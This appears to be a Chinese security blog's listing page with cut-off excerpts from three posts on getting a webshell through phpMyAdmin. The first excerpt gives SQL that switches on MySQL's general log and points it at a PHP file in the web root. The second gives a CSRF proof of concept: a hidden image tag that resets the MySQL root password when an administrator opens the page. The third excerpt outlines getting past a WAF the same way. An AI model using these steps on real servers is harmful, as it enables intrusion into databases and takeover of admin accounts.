三个sql语句拿下phpmyadmin的shell

分类:安全 | 2018-06-17 | 撸过 687 次
0人扯谈

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

phpMyAdmin 4.7.x CSRF 漏洞利用

分类:安全 | 2018-06-15 | 撸过 344 次
0人扯谈

修改root密码:

保存为:webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc

写文件

首先你要知道路径

保存为:webshell.html
[......]

继续阅读

phpmyadmin新姿势getshell

分类:安全 | 2017-03-15 | 撸过 8,824 次
6人扯谈

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell?
首先环境如下:

  • OS:Windows 2003
  • WAF:Safe Dog 4.0正式版
  • phpmyadmin:4.7(许多都可以)
  • Mysql:5.5+
  • PHP:5.3
  • Apache:2.x

目前

into outfile

已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到

general[......]

继续阅读